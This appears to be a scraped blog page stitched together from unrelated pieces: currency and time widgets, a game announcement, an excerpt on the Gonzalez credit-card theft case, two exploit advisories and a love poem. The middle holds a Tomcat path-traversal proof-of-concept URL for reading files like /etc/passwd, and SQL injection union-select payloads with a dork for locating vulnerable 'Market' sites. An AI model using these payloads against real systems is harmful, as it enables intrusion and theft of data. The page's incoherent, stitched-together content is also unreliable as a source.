Jakarta Time
Indonesian Rupiah Exchange Rate
Now available: Ruckingenur II, the latest game in my Games for Engineers series!
In the style of the first Ruckingenur, Ruckingenur II is a game of “rock and roll” reverse engineering of electrical circuits. Unlike the first Ruckingenur, Ruckingenur II is a full game, complete with multiple levels, a soundtrack, and live-action video sequences. Help can be found inside the game. Download link below!
Salcedo says he started getting cold feet when he realized that Lowe's network administrators had detected his presence on their network. He wanted to bail. But he had already lined up a buyer for the credit cards -- a mysterious figure in the computer underground known as SoupNazi, who wouldn't take no for an answer.
Now, "I know for a fact that he was an informant during the time that he was dealing with us," says Salcedo.
"His argument would basically be that ... Gonzalez threatened him as a government agent in order to induce him to plant the sniffer," Rasch says. "He would not have planted the sniffer but for the threat, and his sentence was based on that."
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: prior to 6.0.18
Solution:
- Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)
- Hot fix: Disable allowLinking or do not set URIencoding to utf8
in order to avoid this vulnerability.
- Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next
releases. Please apply the hot fix until next release.
References:
- http://tomcat.apache.org/security.html
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
History:
- 07.17.2008: Initiate notify (To Apache Security Team)
- 08.02.2008: Responsed this problem fixed and released new version
- 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)
- 08.10.2008: Responsed with some suggestions.
Description
As Apache Security Team, this problem occurs because of JAVA side.
If your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as
'UTF-8', an attacker can obtain your important system files.(e.g. /etc/passwd)
Exploit
If your webroot directory has three depth(e.g /usr/local/wwwroot), An
attacker can access arbitrary files as below. (Proof-of-concept)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar
Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Dork:
made by matterdaddy
I miss you since the day where love is much more than kiss and holding hand
It's the day where poet its bitter than symphoni of faith
It's the day where the river sing the rhyme of losing
You are the air that i breath, The song that i sing
The path what im seek, to place my restless hearth
Let me tell the story about the beauty that i can't tell
Let me speak out loud about the love unexplained
It's you and let it be always you who consius me
The one that always inspiring me
How to love and live and to live in love
it's you and always be you ... since the beginning of this poet